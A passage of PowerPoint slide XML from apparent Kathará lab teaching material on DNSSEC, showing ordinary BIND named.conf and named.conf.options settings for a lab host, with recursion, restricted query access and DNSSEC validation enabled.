              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4DD50B-01CB-D776-30A3-D7A885EFACDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E059E6-8A5E-9313-FD6A-9284D5E07F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6121146-74F5-D32E-3318-7242D997B2E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="193964" y="2028522"/>
            <a:ext cx="5289701" cy="2650995"/>
            <a:chOff x="3393" y="3438"/>
            <a:chExt cx="1744" cy="378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD17582A-4F42-B287-E209-F31254EC2860}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3393" y="3467"/>
              <a:ext cx="1744" cy="349"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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None/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>trusted-key.conf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "." {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hint</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45F56CA-7B0D-9899-8061-5D6B2A1EF908}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3421" y="3438"/>
              <a:ext cx="990" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\bind\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24ACB055-D8AB-3FA1-7775-F63CCF7AE1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5744635" y="2028522"/>
            <a:ext cx="6168475" cy="2650995"/>
            <a:chOff x="3393" y="3438"/>
            <a:chExt cx="1744" cy="378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A4759F-3A02-56AC-F512-E433CA780F2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3393" y="3467"/>
              <a:ext cx="1744" cy="349"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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None/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory "/var/cache/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>recursion</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>allow</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-query { 127.0.0.1; 192.168.100.0/24; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>listen</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-on { 127.0.0.1; 192.168.100.10; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-validation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> yes;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944BE9B9-F842-2DC3-3383-6ECBCEBCEF68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3421" y="3438"/>
              <a:ext cx="1311" cy="57"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>\bind\</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188769522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CCF838-7C7E-5275-ED45-E92F672DD8CF}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B709002-8B4F-1AD4-A832-F5DF428F74CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1314750"/>
            <a:ext cx="11159820" cy="4938154"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25EA7E05-CD6D-6D14-8108-4D1EC809F8DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="1681"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
